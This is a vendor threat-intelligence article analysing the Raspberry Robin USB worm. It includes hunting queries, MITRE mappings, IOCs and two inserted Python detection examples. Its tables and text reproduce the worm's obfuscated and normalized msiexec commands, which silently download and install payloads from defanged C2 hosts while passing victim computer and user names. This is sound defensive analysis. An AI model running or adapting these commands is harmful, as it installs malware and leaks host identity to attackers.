Raspberry Robin is a worm transferred via USB drive that connects primarily to external QNAP devices (C2) to download and execute malicious payloads. The worm uses msiexec.exe to connect to its C2 server over HTTP and to download and execute malicious MSI packages. Activity associated with this worm's behavior was first publicly reported by Red Canary in September 2022. There is currently no clear indication of which group is responsible for the creation or distribution of this worm, although its use has been linked to recent SocGholish fake update campaigns earlier this year.
Figure 1. Attack chain associated with Raspberry Robin attack detected by FortiGuard Responder team
Raspberry Robin typically arrives via an infected USB drive, and the main component of the worm appears as an anomalous file on the infected removable device. Numerous file extensions have been associated with these files, and the filenames appear to be randomly generated. The files themselves are not executables but contain a set of obfuscated cmd commands padded with junk data that is ignored on execution. Alongside this file is a LNK file that executes the content of the main Raspberry Robin file stored on the infected USB drive using cmd.exe with the /R parameter. An example of such a command line is shown below, where xyz.usb is an example filename used by Raspberry Robin:
cmd /r c:\windows\system32\cmd.exe < xyz.usb
A successful execution of the malicious file runs msiexec.exe, which connects to the C2 server and downloads a malicious DLL. It also runs explorer.exe to display the contents of a folder on the compromised USB device.
Each of the observed main Raspberry Robin files contains huge chunks of random strings, as shown in Figure 2. However, a regular pattern can be found in each of the observed Raspberry Robin files:
Figure 2. Example of typical Raspberry Robin main file content
Although the C2 server and the folder name to display vary from file to file, each Raspberry Robin malicious file can be identified by the pattern above. The combination of random characters attached to msiexec.exe and explorer.exe also varies, as does the capitalization of the main strings.
Each sample contains the msiexec command that connects to the C2 server. In this sample, the malware connects to as3[.]biz on port 8080 with ‘%computername%’ and ‘%username%’ as additional parameters; these values are populated with victim information on execution.
When cmd executes the contents of sample01.usb, the random strings are ignored and the obfuscation in the commands collapses. For example, the command “^StaR^t mS^i^e^X^Ec /q/i"hTtP://aS3[.]Biz:8080/vS1CN41zizO/%COMPUtERnaME%?%USeRNAmE%"” normalizes to “start msiexec /q/i"http://as3[.]biz:8080/vs1cn41zizo/%computername%?%username%"”. This normalized form can be used to build a command-line based query if process creation telemetry is collected. In the case of this sample, the server at as3[.]biz serves an installer (MSI file) that is used by msiexec.exe. The C2 server also varies from sample to sample, although all observed samples reference a domain related to a QNAP device.
After executing msiexec, another command, ‘start explorer “Removable Disk”’, is executed to display a folder named “Removable Disk” if one is available. Different variants of the Raspberry Robin main file contained different strings referencing various common default names for removable USB drives.
Raspberry Robin uses msiexec.exe to connect to the C2 server and download a malicious MSI package. These commands can be seen in the malicious files found on the infected drives, and the actual command varies from file to file. The addition of random strings to “start msiexec /q /I ” also makes them distinct from other malicious files.
Below is a list of some combinations of the msiexec commands found in different malicious files:
Malicious file hash | Obfuscated msiexec commands | Normalized versions |
503620130e7d59853f7ba2119c9b410f0fe346ec | ^StaR^t mS^i^e^X^Ec /q/i"hTtP://aS3[.]Biz:8080/vS1CN41zizO/%COMPUtERnaME%?%USeRNAmE%" | start msiexec /q/i"http[:]//as3[.]biz:8080/vs1cn41zizo/%computername%?%username%" |
5506fc14acac1dc841abff2b972c972f3f1722ec | sT^ar^T ms^I^e^X^ec /Q /i"htTp://eJ3[.]xyZ:8080/xj92YfGKOB/%COmPUTeRNAmE%?%UseRName%" | start msiexec /q /i"http[:]//ej3[.]xyz:8080/xj92yfgkob/%computername%?%username%" |
D92379ee6065391d06cb218dd0d713aa0e7b7942 | st^a^RT m^S^i^E^XeC ^h^L^x^kG^OA^aJ=cG^b^vK^W ^N^c^gBQ^j^YE^q=pS^r^t^t^Y^eG ^sW^aI^BH=^uD^o /Q ^Hp^yxy=^qxP ^bWiW^Uxi=ioA^Z^O -^f^v "http://5jb[.]Me:8080/yyyOd4/bXXDil5hPAU4EHelvZzFJewbWXUu0/xVKlBoCc/%ComputeRNaME%?%USeRnAMe%" | start msiexec /q -fv "http[:]//5jb[.]me:8080/yyyod4/bxxdil5hpau4ehelvzzfjewbwxuu0/xvklbocc/%computername%?%username%" |
008945cc473304fe2ad7aa4af6b14a120e6703b2 | St%fFFyTpReitUHj%a^RT%ffFytPREiTUhj% %FFFyTpReituhj%M^s^ie%fffyTPreiTUHJ%X^EC ^E^WjZ^L=Z^y^UQ^T^n^F^x ^vHe^t^H=ENa^p^h^n ^e^ry^ZIN=G^g /Q ^rv=^H^u^Bi f^oH^YML^wn=^H^kLtj^u^u ^I^G^v^sxI=ld^uK^kL^aN^U /^I"HttP://W4[.]nz:8080/A/rB/ZQ3N3i36PkkKgOuu6K/%compUTErnAme%=%useRNaMe%" | start msiexec /q /i"http[:]//w4[.]nz:8080/a/rb/zq3n3i36pkkkgouu6k/%computername%=%username%" |
Table 1. List of some combinations of msiexec commands found in different malicious samples
The msiexec parameter /q (short for /quiet) specifies quiet mode, meaning no user interaction is required, while the /i parameter specifies a normal installation.
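The normalization described above, as an added example that is not code from the article: the routine below reproduces cmd's handling of the padding (undefined %name% references expand to nothing, ^ escapes are dropped, bare NAME=value tokens are msiexec property junk) and runs it over the four obfuscated commands from Table 1, then checks the result against the stable pattern the article identifies. The function names and the `looks_like_raspberry_robin` heuristic are this example's own.

```python
import re

# Only these two variables are meant to expand (victim identification); every
# other %name% in the sample files is an undefined variable, which cmd expands
# to an empty string, so it serves purely as padding.
KNOWN_VARS = {"computername", "username"}

# Bare NAME=value tokens are msiexec public-property assignments used as junk
# padding; the real URL argument always starts with /, - or a quote.
JUNK_PROPERTY = re.compile(r"^[A-Za-z0-9]+=[A-Za-z0-9]*$")

def expand_vars(text: str) -> str:
    """Keep %computername%/%username%, drop every other %name% reference."""
    def sub(m):
        return m.group(0) if m.group(1).lower() in KNOWN_VARS else ""
    return re.sub(r"%([^%\s]+)%", sub, text)

def normalize_cmd(line: str) -> str:
    """Follow cmd's own order: % expansion first, then ^ escapes, then drop
    junk property tokens, collapse whitespace and fold case."""
    text = expand_vars(line)
    text = text.replace("^", "")  # ^x is just x for the letters used here
    tokens = [t for t in text.split() if not JUNK_PROPERTY.match(t)]
    return " ".join(tokens).lower()

def looks_like_raspberry_robin(normalized: str) -> bool:
    """The pattern the article describes: a quiet msiexec install of an http
    package on port 8080 that embeds the victim's computer name."""
    return (normalized.startswith("start msiexec")
            and "/q" in normalized
            and "http" in normalized
            and ":8080" in normalized
            and "%computername%" in normalized)

# Obfuscated msiexec commands reproduced from Table 1 (defanged as on the page)
TABLE1_SAMPLES = [
    '^StaR^t mS^i^e^X^Ec /q/i"hTtP://aS3[.]Biz:8080/vS1CN41zizO/%COMPUtERnaME%?%USeRNAmE%"',
    'sT^ar^T ms^I^e^X^ec /Q /i"htTp://eJ3[.]xyZ:8080/xj92YfGKOB/%COmPUTeRNAmE%?%UseRName%"',
    'st^a^RT m^S^i^E^XeC ^h^L^x^kG^OA^aJ=cG^b^vK^W ^N^c^gBQ^j^YE^q=pS^r^t^t^Y^eG ^sW^aI^BH=^uD^o /Q ^Hp^yxy=^qxP ^bWiW^Uxi=ioA^Z^O -^f^v "http://5jb[.]Me:8080/yyyOd4/bXXDil5hPAU4EHelvZzFJewbWXUu0/xVKlBoCc/%ComputeRNaME%?%USeRnAMe%"',
    'St%fFFyTpReitUHj%a^RT%ffFytPREiTUhj% %FFFyTpReituhj%M^s^ie%fffyTPreiTUHJ%X^EC ^E^WjZ^L=Z^y^UQ^T^n^F^x ^vHe^t^H=ENa^p^h^n ^e^ry^ZIN=G^g /Q ^rv=^H^u^Bi f^oH^YML^wn=^H^kLtj^u^u ^I^G^v^sxI=ld^uK^kL^aN^U /^I"HttP://W4[.]nz:8080/A/rB/ZQ3N3i36PkkKgOuu6K/%compUTErnAme%=%useRNaMe%"',
]

def normalize_all() -> list:
    """Normalized form of every Table 1 command, in table order."""
    return [normalize_cmd(s) for s in TABLE1_SAMPLES]

if __name__ == "__main__":
    for raw, clean in zip(TABLE1_SAMPLES, normalize_all()):
        print(f"{looks_like_raspberry_robin(clean)!s:5}  {clean}")
```

The same `normalize_cmd` can be applied to the explorer commands in Table 2; the classifier is only for the msiexec line.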
FortiEDR captures information related to the execution of msiexec.exe when it connects to the C2 server, using the following threat hunting query:
Type: ("Process Creation") AND Source.Process.Name: ("msiexec.exe") AND Source.Process.CommandLine: ("\/q\/i") AND Source.Process.CommandLine: ("http") AND Source.Process.CommandLine: ("\:8080")
Another threat hunting query shows the HTTP requests made by msiexec.exe whose URL contains port 8080:
Type: ("HTTP Request") AND URL: (":8080") AND Source.Process.Name: ("msiexec.exe")
Figure 3 below shows the details of one of the results of the query above, including the actual C2 server. This query matches every HTTP request whose URL contains port 8080.
Figure 3. Details on one of the results of the threat hunting query mentioned above
Similar to the msiexec command, “start explorer ” is mixed with random strings in the different malicious files. Raspberry Robin uses explorer to display a folder with the specified name: if a folder with that name exists it is opened; otherwise the default folder is displayed. These commands are likely included so that when the user clicks the LNK file the expected folder opens, matching normal behavior and preventing the user from suspecting that anything suspicious has occurred.
The table below lists the different “start explorer ” commands found in a number of analyzed samples:
Malicious file hash | Obfuscated explorer commands | Normalized versions |
503620130e7d59853f7ba2119c9b410f0fe346ec | ^s^t^a^r^t ^e^x^P^l^orE^R "Removable Disk" | start explorer "removable disk" |
5506fc14acac1dc841abff2b972c972f3f1722ec | S^TA^rT ^E^xPl^o^R^e^r "USB Drive" | start explorer "usb drive" |
D92379ee6065391d06cb218dd0d713aa0e7b7942 | S^t^aRt ex^PL^o^rE^R "ETIENNE II" | start explorer "etienne ii" |
008945cc473304fe2ad7aa4af6b14a120e6703b2 | St%ffFYtPreituHj%a^Rt%FffytPReITUhj% %FfFytPreitUHJ%e%FfFYtPReiTUhJ%X %fffytPrEituHj%P^lO%FFfYTpReITUhJ%R %ffFYtpReITuHj%e^R %fFfYtPrEiTuHj% v^IN^o^d | start explorer vinod |
Table 2. List of some combinations of explorer commands found in different malicious samples
Recently, we have seen new Raspberry Robin samples on endpoints protected by FortiEDR. In one of the analyzed incidents (see Figure 4 below), a USB drive was identified containing an LNK and an ICO file. The user clicked the LNK file, which called a cmd process to execute the contents of the ‘Fn.ICO’ file containing the Raspberry Robin commands. As described in the previous section, the ‘Fn.ICO’ file contains a number of simple commands used to download and execute a malicious MSI package from a C2 server. In this case the contacted domain was ‘u0[.]rS’. The complete msiexec command is shown below (defanged):
msiexec.exe /qN -I "hTtP[:]//u0[.]rS[:]8080/BWB/PCbSiPnwkyKeutehyw4kvXESHV1an/<computername>?<username>"
Figure 4 below shows the execution of the LNK file leading to the connection to its C2 server. When a user clicks the LNK file, FortiEDR identifies explorer.exe executing cmd.exe (the expected LNK file process chain). The execution of the LNK triggers another cmd.exe process, which then runs a series of msiexec.exe processes that download an installer from the C2 server ‘u0[.]rS’. In this event the malicious msiexec.exe process creates a suspended instance of dllhost.exe (a standard Windows binary), which is subsequently hollowed with a malicious payload before the process is resumed.
Process hollowing is a technique in which a process is started in a suspended state and its in-memory code is then overwritten with different (often malicious) code. It can be used to hide malicious code within a whitelisted process. Process hollowing is also a way to execute a new executable without creating a new file, as the malicious code is written directly into memory rather than touching disk. When the hollowed process was resumed, the code injected into the dllhost.exe process connected to a second-stage C2 server, 199[.]249[.]230[.]115.
Figure 4. FortiEDR blocks Raspberry Robin’s connection attempt to its C2 server
In the attack analyzed above the affected customer did not have process hollowing protections in place, but FortiEDR blocked the C2 connection attempts, preventing the hollowed implant from communicating with its C2. FortiEDR has out-of-the-box rules to prevent this process hollowing behavior and can be configured to remove hollowed implants using automated playbooks.
Using the Fortinet Central Threat System (CTS) shown in Figure 5, we can see that the IP address 199[.]249[.]230[.]115 is tagged as a Tor exit node. Tor (short for ‘The Onion Router’) is a free and open-source network for anonymous communication and is one way for threat actors to hide their C2. Unless there is a business need, it is recommended that customers block all communications to and from Tor exit nodes in corporate environments where possible. CISA guidance on protecting against Tor access to and from your network is available in the following advisory: https://www.cisa.gov/uscert/sites/default/files/publications/AA20-183A_Defending_Against_Malicious_C...
Figure 5. Fortinet Central Threat Service (CTS) identifies 199[.]249[.]230[.]115 as a Tor exit node
The behavior analyzed above is just one of many observed Raspberry Robin infections detected and blocked by FortiEDR. The FortiGuard MDR team also identified variants that performed process hollowing targeting dllhost.exe, rundll32.exe and regsvr32.exe. Defenders using telemetry-based monitoring should also look for anomalous network connections from these three executables where the parent process is msiexec.exe, if a tool capable of detecting process hollowing is not available.
The continued prevalence of Raspberry Robin highlights the need for organisations to keep monitoring the use of USB devices within their networks. It also highlights the need to consider the USB worm as a potential attack vector, despite it being less common than the phishing or direct-access initial access methods seen in more prevalent threats. Should this type of worm be used to transfer a malicious payload into a FortiEDR protected environment, FortiEDR is positioned to continue providing protection from post-exploitation activity.
FortiEDR Threat Hunting telemetry can also be used to build additional detection methods that attribute observed activity to potential Raspberry Robin activity more quickly and expedite analyst triage. Threat Hunting queries designed to assist with detecting Raspberry Robin activity are shown below, together with the MITRE ATT&CK techniques involved in this activity and related observables, and IOCs related to the observed activity.
This query returns all process creation events for msiexec.exe where the command line parameters include ‘/q /i’, which indicates that msiexec is quietly installing an MSI package, together with the parameters ‘http’ and ‘8080’, which can indicate that the command is being used to access a remote MSI package. There may be false positives if software used in the monitored environment relies on msiexec to install remote MSI packages as part of updates, but none were observed during testing:
Type: ("Process Creation") AND Source.Process.Name: ("msiexec.exe") AND Source.Process.CommandLine: ("\/q\/i") AND Source.Process.CommandLine: ("http") AND Source.Process.CommandLine: ("\:8080")
This query returns all HTTP request events for msiexec.exe where the URL contains port 8080. It is a more generic version of the query above. As with the previous query, there may be false positives if software used in the monitored environment relies on msiexec to install remote MSI packages as part of updates, but none were observed during testing:
Type: ("HTTP Request") AND URL: (":8080") AND Source.Process.Name: ("msiexec.exe")
This query returns all process creation events for dllhost.exe, rundll32.exe and regsvr32.exe processes spawned by msiexec.exe processes whose command line arguments are consistent with the behavior of Raspberry Robin samples observed by the FortiGuard MDR team. As with the previous query, there may be false positives if software used in the monitored environment relies on msiexec to install remote MSI packages as part of updates, but none were observed during testing:
This query detects thread created events where the source process is msiexec.exe and the child process is one of the processes targeted with process hollowing in the Raspberry Robin activity observed by the FortiGuard MDR team. There are no expected false positives associated with this activity:
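The detection logic behind the queries above and the guidance on msiexec-spawned dllhost.exe, rundll32.exe and regsvr32.exe, as an added example in Python that is not FortiEDR's own query language or code: three rules are run over a small set of constructed process-creation and network-connection events, flagging a quiet remote MSI install on port 8080, a hollowing-target process spawned by msiexec.exe, and a network connection from such a child. The event field names (`type`, `name`, `parent`, `cmdline`, `remote`) and the rule names are this example's own.

```python
import re

# Processes the FortiGuard MDR team observed being hollowed by msiexec.exe
HOLLOW_TARGETS = {"dllhost.exe", "rundll32.exe", "regsvr32.exe"}

def is_remote_quiet_install(cmdline: str) -> bool:
    """First query in code: a quiet (/q) install (/i) of a package fetched
    over http on port 8080; the /qN and -I spellings from Figure 4 also match."""
    c = cmdline.lower()
    quiet = re.search(r'[/-]q[a-z]*(?=[\s/"]|$)', c) is not None
    install = re.search(r'[/-]i(?=[\s"]|$)', c) is not None
    return quiet and install and "http" in c and ":8080" in c

def triage(events):
    """Run the three rules over the telemetry and return (rule name, event
    index) pairs for analyst review."""
    hits = []
    for idx, ev in enumerate(events):
        kind = ev["type"]
        name = ev["name"].lower()
        parent = ev.get("parent", "").lower()
        if kind == "Process Creation" and name == "msiexec.exe" \
                and is_remote_quiet_install(ev.get("cmdline", "")):
            hits.append(("msiexec_remote_quiet_install", idx))
        elif kind == "Process Creation" and name in HOLLOW_TARGETS \
                and parent == "msiexec.exe":
            hits.append(("hollow_target_spawned_by_msiexec", idx))
        elif kind == "Network Connection" and name in HOLLOW_TARGETS \
                and parent == "msiexec.exe":
            hits.append(("hollow_target_network_from_msiexec_child", idx))
    return hits

# Constructed sample telemetry (not real FortiEDR events). Event 0 carries the
# normalized as3[.]biz command from Table 1 with a made-up host and user; the
# remote address in event 3 is the Tor exit node named in the article. All
# values are defanged.
SAMPLE_EVENTS = [
    {"type": "Process Creation", "name": "msiexec.exe", "parent": "cmd.exe",
     "cmdline": 'msiexec /q/i"http://as3[.]biz:8080/vs1cn41zizo/HOST01?alice"'},
    {"type": "Process Creation", "name": "msiexec.exe", "parent": "explorer.exe",
     "cmdline": r"msiexec /i C:\Users\alice\Downloads\tool.msi"},  # benign local install
    {"type": "Process Creation", "name": "dllhost.exe", "parent": "msiexec.exe",
     "cmdline": "dllhost.exe"},
    {"type": "Network Connection", "name": "dllhost.exe", "parent": "msiexec.exe",
     "remote": "199[.]249[.]230[.]115"},
    {"type": "Network Connection", "name": "dllhost.exe", "parent": "svchost.exe",
     "remote": "10[.]0[.]0[.]5"},  # ordinary COM surrogate traffic, not flagged
    {"type": "Process Creation", "name": "regsvr32.exe", "parent": "msiexec.exe",
     "cmdline": "regsvr32.exe"},
]

if __name__ == "__main__":
    for rule, idx in triage(SAMPLE_EVENTS):
        print(f"{rule}: event {idx} -> {SAMPLE_EVENTS[idx]}")
```

The first rule inherits the false-positive caveat noted above: legitimate update tooling that installs remote MSI packages over port 8080 will also match and needs to be allow-listed by command line or parent.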
Technique ID | Technique Description | Observed Activity |
T1091 | Replication Through Removable Media | Raspberry Robin activity analysed as part of this article is executed via a compromised USB drive. As of now, we do not know how the USB drives are getting infected. |
T1204.002 | User Execution: Malicious File | Raspberry Robin has relied upon users clicking on a malicious LNK file on a compromised USB drive. |
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Raspberry Robin includes the use of LNK execution to run cmd.exe, which executes a set of commands stored in a file found on the USB drive. Due to LNK execution, the parent process of cmd.exe will always be explorer.exe. |
T1218.009 | System Binary Proxy Execution: msiexec.exe | Raspberry Robin uses msiexec.exe to download and run a malicious installer. Msiexec.exe is called from a cmd.exe process as part of LNK execution and includes a URL as part of the command line arguments. |
T1055.012 | Process Injection: Process Hollowing | Raspberry Robin uses process hollowing to embed its final payload into a separate process. Variants observed by the FortiGuard MDR team have targeted dllhost.exe, rundll32.exe and regsvr32.exe processes. The hollowed processes were spawned by the msiexec.exe process. |
T1027 | Obfuscated Files or Information | Raspberry Robin executes commands stored in a file on the USB drive. It contains obfuscated msiexec.exe and explorer commands that include randomized strings. |
T1071.001 | Application Layer Protocol: Web Protocols | Raspberry Robin tries to download a malicious installer from its C2 server via a web request from the msiexec.exe process (legitimate msiexec functionality). Once the installer has executed and created a hollowed process (dllhost.exe, rundll32.exe, regsvr32.exe) with an injected payload, the payload also attempts to connect to its C2 server via web requests to the Tor network. |
Indicator Description | Indicator | Indicator Type | Associated Tactic | Notes | First Observed |
Raspberry Robin sample | 503620130e7d59853f7ba2119c9b410f0fe346ec | SHA1 Hash | Installation | Raspberry Robin sample that tries to connect to aS3[.]Biz | 2022-05-09 |
Raspberry Robin sample | 5506fc14acac1dc841abff2b972c972f3f1722ec | SHA1 Hash | Installation | Raspberry Robin sample that tries to connect to eJ3[.]xyZ | 2022-05-30 |
Raspberry Robin sample | D92379ee6065391d06cb218dd0d713aa0e7b7942 | SHA1 Hash | Installation | Raspberry Robin sample that tries to connect to 5jb[.]Me | 2022-08-01 |
Raspberry Robin sample | 008945cc473304fe2ad7aa4af6b14a120e6703b2 | SHA1 Hash | Installation | Raspberry Robin sample that tries to connect to w4[.]nz | 2022-08-06 |
MSI file | 3b552f77179299d3a3df06b3f687eb91013d46bb | SHA1 Hash | Installation | MSI sample downloaded from Raspberry Robin's C2 server such as w4[.]nz | 2022-07-03 |
DLL file | bfcfa72ba5095fba108314c1c4deb5faed82ef4d | SHA1 Hash | Installation | DLL file packaged within the MSI file downloaded by Raspberry Robin | 2022-01-20 |
Malicious URL | http[:]//as3[.]biz:8080/vs1cn41zizo | URL | Installation | Raspberry Robin C2 URL to download a malicious installer | 2022-05-09 |
Malicious URL | http[:]//ej3[.]xyz:8080/xj92yfgkob | URL | Installation | Raspberry Robin C2 URL to download a malicious installer | 2022-05-30 |
Malicious URL | http[:]//5jb[.]me:8080/yyyod4/bxxdil5hpau4ehelvzzfjewbwxuu0/xvklbocc | URL | Installation | Raspberry Robin C2 URL to download a malicious installer | 2022-08-01 |
Malicious URL | http[:]//w4[.]nz:8080/a/rb/zq3n3i36pkkkgouu6k | URL | Installation | Raspberry Robin C2 URL to download a malicious installer | 2022-08-06 |
Malicious URL | hTtP[:]//u0[.]rS[:]8080/BWB/PCbSiPnwkyKeutehyw4kvXESHV1an/ | URL | Installation | Raspberry Robin C2 URL to download a malicious installer | 2022-014 |
Copyright 2025 Fortinet, Inc. All Rights Reserved.